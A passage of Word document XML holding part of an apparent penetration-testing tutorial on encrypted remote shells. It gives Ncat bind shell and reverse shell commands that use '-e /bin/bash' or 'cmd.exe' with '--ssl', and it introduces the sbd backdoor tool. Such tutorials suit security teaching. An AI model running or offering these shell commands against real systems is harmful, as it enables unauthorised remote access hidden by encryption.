    <w:p w14:paraId="3ED39E71" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ncat uses SSL/TLS to create a secure connection to the target, as shown in the Wireshark capture above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57723362" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind shells:</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Target: </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -nvlp </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>&lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>-e </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/bin/bash </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>--ssl</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Attacker: </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -nv </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>&lt;target-ip&gt; &lt;port&gt;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A2ABD" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells:</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Target: </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -nv </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>&lt;target-ip&gt; &lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>-e </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/bin/bash </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>| </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>} --</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Attacker: </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ncat -nvlp </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>&lt;port&gt;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B68355" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF69B3B" wp14:editId="2BAE0392">
            <wp:extent cx="22136100" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 2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for po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136100" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD91238" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DCBC969" wp14:editId="1DFAA507">
            <wp:extent cx="22136100" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Picture 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for po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136100" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CCCFB" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Ncat encrypted reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67707C78" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sbd</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, or Secure Back Door, is another tool that is used to generate shells with strong encryption (AES-CBC-128 &amp; HMAC-SHA1). It uses a similar syntax as Ncat, except it doesn’t use SSL/TLS, and therefore don’t have the</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> --ssl </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>option to specify an encrypted shell. Instead, the option to enable encryption is </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>-c on</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, which is on </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>by default</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, so it does not need to be specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6163E5C7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3399B5E4" wp14:editId="2AE3B615">
            <wp:extent cx="17792700" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 2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for po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792700" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072E97F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CCD1DB0" wp14:editId="63F8F5E0">
            <wp:extent cx="17792700" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Picture 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for pos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792700" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63747DAF" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sbd encrypted bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07068688" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
